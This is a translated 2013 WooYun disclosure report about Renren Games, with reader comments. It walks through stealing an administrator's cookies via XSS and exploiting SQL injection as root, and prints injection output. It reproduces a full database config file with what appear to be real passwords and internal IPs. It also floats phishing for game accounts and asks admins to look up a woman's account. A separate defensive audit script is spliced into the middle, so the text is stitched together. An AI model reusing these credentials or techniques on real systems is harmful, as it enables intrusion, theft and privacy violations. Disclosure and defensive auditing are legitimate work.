
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-018510

Title: Renren Games XSS + SQL injection + path disclosure + directory listing, large-scale leak of employee information

Vendor: Renren

Author: whirlwind

Submitted: 2013-02-07 22:29

Fixed: 2013-03-24 22:30

Published: 2013-03-24 22:30

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-02-07: Details sent to the vendor, awaiting vendor handling
2013-02-11: Vendor has confirmed; details disclosed to the vendor only
2013-02-21: Details disclosed to core white hats and domain experts
2013-03-03: Details disclosed to regular white hats
2013-03-13: Details disclosed to intern white hats
2013-03-24: Details disclosed to the public

Brief description:

XSS to steal cookies, plus injection; the privileges are quite high, load_file('/etc/passwd') works directly
Looks like wan.renren.com could be taken over

Detailed description:

http://wan.renren.com/service.shtml
First I picked a random customer-service contact here and inserted XSS code in the submission, in the name field I think, I forget; then the cookies came in
Then into the backend, as a senior administrator no less
Path disclosure: http://rrcrm.data.io8.org/lib/
/data/web/crm.imop.com/
SQL injection: http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
The cookies must be valid for the injection to work

Target: http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
Host IP: 60.29.248.160
Powered-by: PHP/5.2.5
Web Server: lighttpd/1.4.13
DB Server: MySQL >=5
Resp. Time(avg): 149 ms
Current User: root@localhost
Sql Version: 5.1.38-community-log
Current DB: CRM
System User: root@localhost
Host Name: TJHY248-160.opi.com
Installation dir: /
Data Bases: information_schema
CRM
CRMUSER
binlogs
mysql
test
testcrm
tongyongcrm
user_classfy


Next, let's look for passwd



Then the MySQL and other database configuration
/data/web/crm.imop.com/config.inc.php

<?php
/**
* Database connection parameters
*/
$cfg['sqlserv'] = 'localhost';
$cfg['sqluser'] = 'root';
$cfg['sqlpass'] = 'crm123li';
$cfg['sqllibr'] = 'CRM';
/**
* Page TITLE
*/
$cfg['title'] = 'CRM管理系统2011';
/**
* Template paths
*/
$cfg['template'] = 'templates';
$cfg['template_c'] = 'templates_c';
$color = array("black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44","black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44");
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','crm123li');
define('CRM_DB','CRM');
define('MARKET_ALL_HOST','sg.data.io8.org:3306');
define('MARKET_ALL_USER','stat');
define('MARKET_ALL_PWD','petnewstatZL123');
define('MARKET_ALL_DB','market_all');
//define("GAME_HOST","10.30.32.126:3306");
define("GAME_HOST","10.22.222.23");
define("GAME_USER","webcrm");
define("GAME_PWD","webcrm123");
define("GAME_DB","GAMEUSER");
define("GAMEPAY_DB","GAMEPAY");// backend accounting
define("MGC_HOST","10.22.225.87:3306");
define("MGC_USER","webcrm");
define("MGC_PWD","webcrm123");
define("MGC_DB","GAMEUSER");
define("SSWEB_HOST","10.22.225.61:5003");
define("SSWEB_USER","webcrm");
define("SSWEB_PWD","webcrm123");
define("SSWEB_DB","ss_web");
//define("SSGC_HOST","10.22.225.22:4001");
//define("SSGC_USER","webcrm");
//define("SSGC_PWD","webcrm123");
//define("SSGC_DB","GAMEUSER");
define("SSGC_HOST","10.22.238.140:3306");
define("SSGC_USER","webcrm");
define("SSGC_PWD","webcrm123");
define("SSGC_DB","GAMEUSER");
define("SSCRM_HOST",'localhost:3306');
define("SSCRM_USER",'webcrm');
define("SSCRM_PWD",'webcrm123');
define("SSCRM_DB",'SSCRM');
//define("SHOP_HOST","10.22.225.34:3306");
define("SHOP_HOST","10.30.36.201");
define("SHOP_USER","webcrm");
define("SHOP_PWD","webcrm123");
define("SHOP_DB","mop_shop");
// Xiaonei center
define("XIAONEI_HOST","10.22.225.115:3306");
define("XIAONEI_USER","webcrm");
define("XIAONEI_PWD",'webcrm123');
define("XIAONEI_DB","XNTSGAMELOCALPAY");
// accounting DB
define("SUM_HOST","crmdb.data.io8.org");
define("SUM_USER","webcrm");
define("SUM_PWD",'webcrm123');
define("SUM_DB","CRMUSER");
// message server db
define("MSG_HOST","10.30.32.95:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'webcrm123');
define("MSG_DB","IMOPMSG");
// pagination settings
define("PAGE_MAX", 20);
define("PAGE_NUM", 10);
?>


So many of them
Also found an FCKeditor along the way
http://cms-na.tech.io8.org/fckeditor/
http://rrcrm.data.io8.org/lib/FCKeditor/
Also, once in the backend you can edit announcements with no filtering at all; if I set up a basic-auth phishing page, heh, I might even get hold of some game accounts
Lastly, I found that the default passwords for their game backend are all 123456
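An added audit script, written for this page and not code from the report or from Renren, that checks for two of the weaknesses described above: the config.inc.php pattern of one webcrm password reused across many database hosts, and backend accounts whose unsalted MD5 hash equals md5('123456'), the default the report says the game backend uses. Every host, password and user row below is a constructed placeholder, not a value from the report.

```python
# Two audit checks (constructed data only): reused DB passwords in a
# config.inc.php-style file, and CRM accounts on a default MD5 password.
import hashlib
import re
from collections import defaultdict

# Constructed sample in the same define() layout as the leaked config.inc.php.
# Hosts and passwords are placeholders, not the values from the report.
SAMPLE_CONFIG = """<?php
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','EXAMPLE_root_pw');
//define("GAME_HOST","10.0.0.9:3306");
define("GAME_HOST","10.0.0.1");
define("GAME_USER","webcrm");
define("GAME_PWD","EXAMPLE_shared_pw");
define("MSG_HOST","10.0.0.2:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'EXAMPLE_shared_pw');
define("PAGE_MAX", 20);
?>"""

# Matches live define('PREFIX_HOST|USER|PWD', 'value') lines; the ^ anchor with
# re.MULTILINE skips the commented-out //define(...) entries.
DEFINE_RE = re.compile(
    r"""^\s*define\(\s*['"](\w+)_(HOST|USER|PWD)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""",
    re.MULTILINE,
)

def parse_db_credentials(php_source):
    """Return {prefix: {'HOST': ..., 'USER': ..., 'PWD': ...}} for every connection
    that has a password define; constants like PAGE_MAX are ignored."""
    creds = defaultdict(dict)
    for prefix, field, value in DEFINE_RE.findall(php_source):
        creds[prefix][field] = value
    return {p: fields for p, fields in creds.items() if "PWD" in fields}

def reused_passwords(creds):
    """Map each password shared by two or more connections to those connections."""
    by_password = defaultdict(list)
    for prefix, fields in creds.items():
        by_password[fields["PWD"]].append(prefix)
    return {pw: sorted(ps) for pw, ps in by_password.items() if len(ps) > 1}

# Unsalted MD5 of common defaults; md5("123456") is e10adc3949ba59abbe56e057f20f883e,
# the default the report says the game backend uses.
DEFAULT_PASSWORDS = ["123456", "", "123123", "111111", "password", "1", "0"]
DEFAULT_HASHES = {hashlib.md5(p.encode()).hexdigest(): p for p in DEFAULT_PASSWORDS}

# Constructed rows in the report's "realname team password username id" layout
# (tab-separated); names are placeholders.
SAMPLE_USERS = """realname\tteam\tpassword\tusername\tid
User A\t,46,\te10adc3949ba59abbe56e057f20f883e\tuser.a\t1
User B\t,43,42,\t1f3870be274f6c49b3e31a0c6728957f\tuser.b\t2
User C\t,4,\td41d8cd98f00b204e9800998ecf8427e\tuser.c\t3
User D\t,36,\tE10ADC3949BA59ABBE56E057F20F883E\tuser.d\t4
"""

def audit_user_hashes(tsv_dump):
    """Return {username: recovered_default_password} for every row whose
    password column is the MD5 of a known default (case-insensitive)."""
    rows = tsv_dump.strip().splitlines()
    header = rows[0].split("\t")
    pw_col, user_col = header.index("password"), header.index("username")
    hits = {}
    for line in rows[1:]:
        cols = line.split("\t")
        digest = cols[pw_col].strip().lower()
        if digest in DEFAULT_HASHES:
            hits[cols[user_col]] = DEFAULT_HASHES[digest]
    return hits

def default_password_ratio(tsv_dump):
    """Fraction of accounts sitting on a default password (0.0 for an empty dump)."""
    rows = tsv_dump.strip().splitlines()[1:]
    return len(audit_user_hashes(tsv_dump)) / len(rows) if rows else 0.0

if __name__ == "__main__":
    print("Reused DB passwords:", reused_passwords(parse_db_credentials(SAMPLE_CONFIG)))
    print("Accounts on default passwords:", audit_user_hashes(SAMPLE_USERS))
```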

Proof of vulnerability:

[Screenshot: QQ截图20130207215757.gif]

[Screenshot: 2.gif]



Suggested fix:

Filter XSS, then restrict administrator privileges, and strengthen training
Asking for a gift; Renren admins, please add me on Skype: whirlwind110@live.com
I'd like to ask you a favor: look up a girl's account...

Copyright notice: when reposting, please credit the source whirlwind@WooYun


Vulnerability response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2013-02-11 13:15

Vendor reply:

Thanks

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-02-07 22:34 | 疯狗 Verified white hat ( Intern white hat | Rank:44 Vulnerabilities:2 | Having seen every vulnerability under heaven, the heart is naturally free of code.)

    oh my god, load_file still works directly these days? Bizarre

  2. 2013-02-07 22:35 | whirlwind ( Intern white hat | Rank:34 Vulnerabilities:8 | 极光肖风)

    @疯狗 Nearly wet myself just now, but outfile doesn't work

  3. 2013-02-07 22:45 | 疯狗 Verified white hat ( Intern white hat | Rank:44 Vulnerabilities:2 | Having seen every vulnerability under heaven, the heart is naturally free of code.)

    @whirlwind Insufficient privileges? Or a different machine?

  4. 2013-02-07 22:54 | Coody Verified white hat ( Core white hat | Rank:1565 Vulnerabilities:189 | No jobs taken, no black-market work; anyone taking jobs or apprentices in my name is not me...)

    Is this the New Year gift package?

  5. 2013-02-07 22:56 | yhoojj ( Regular white hat | Rank:110 Vulnerabilities:14 | BurNing)

    New Year gift package indeed

  6. 2013-02-07 22:58 | whirlwind ( Intern white hat | Rank:34 Vulnerabilities:8 | 极光肖风)

    @疯狗 Magic... stumped... no upload in the backend, FCK 2.66

  7. 2013-02-08 08:40 | 蟋蟀哥哥 ( Regular white hat | Rank:363 Vulnerabilities:57 | Sichuan native, post-80s homebody, self-taught, a failure of the Celestial Empire's education...)

    You're basically not letting people have their New Year..

  8. 2013-02-08 13:50 | whirlwind ( Intern white hat | Rank:34 Vulnerabilities:8 | 极光肖风)

    @蟋蟀哥哥 I just thought of that too,, all I can do is apologize to the Renren admins

  9. 2013-02-08 15:13 | 蟋蟀哥哥 ( Regular white hat | Rank:363 Vulnerabilities:57 | Sichuan native, post-80s homebody, self-taught, a failure of the Celestial Empire's education...)

    @whirlwind So mean. Not letting people enjoy New Year..

  10. 2013-02-12 00:10 | Csser ( Passer-by | Rank:11 Vulnerabilities:6 )

    The reporter is so mean, they'll have to work overtime again.

  11. 2013-02-13 09:59 | xsser Verified white hat ( Regular white hat | Rank:254 Vulnerabilities:18 | When I look back on everything again, will this world get better?)

    I'll just honestly eat meat over New Year

  12. 2013-02-13 17:34 | 不懂xx ( Passer-by | Rank:22 Vulnerabilities:5 | Faceless Void, where to)

    Path disclosure and loadfile on top of it, damn.

  13. 2013-02-16 23:55 | 一刀终情 ( Regular white hat | Rank:156 Vulnerabilities:28 | PKAV tech geek community - security enthusiast)

    @xsser Fatter or thinner? If fatter, you ate the pork; if thinner, a woman ate the meat

  14. 2013-03-03 15:50 | px1624 ( Regular white hat | Rank:1036 Vulnerabilities:175 | px1624)

    A few too many tags..

  15. 2013-03-04 09:33 | 浩天 Verified white hat ( Regular white hat | Rank:915 Vulnerabilities:79 | On vacation...)

    You've leaked a bit much, it should be blurred; Renren will have to change so many passwords

  16. 2013-03-04 11:11 | redrain有节操 ( Regular white hat | Rank:183 Vulnerabilities:26 | ztz has 165 now!>_<'/&\)

    The proof screenshot shows too much

  17. 2013-03-15 15:17 | whitemonty ( Passer-by | Rank:7 Vulnerabilities:4 | Secur1ty just lik3 a girl. B0th of th3m ...)

    Those tags again... badass!

  18. 2013-03-25 00:49 | 西毒 ( Regular white hat | Rank:221 Vulnerabilities:33 | Only with humility can one keep surpassing oneself)

    This approach is worth learning from

  19. 2013-03-25 13:59 | Tracker ( Passer-by | Rank:16 Vulnerabilities:4 | Vendors abuse me a thousand times, I treat vendors like a first love!)

    @蟋蟀哥哥 @&Tracker from osc passing by..

  20. 2013-03-25 15:07 | 银冥币 ( Intern white hat | Rank:35 Vulnerabilities:21 | "/upload/avatar/avatar_251_b.jpg" />)

    The tags are impressive...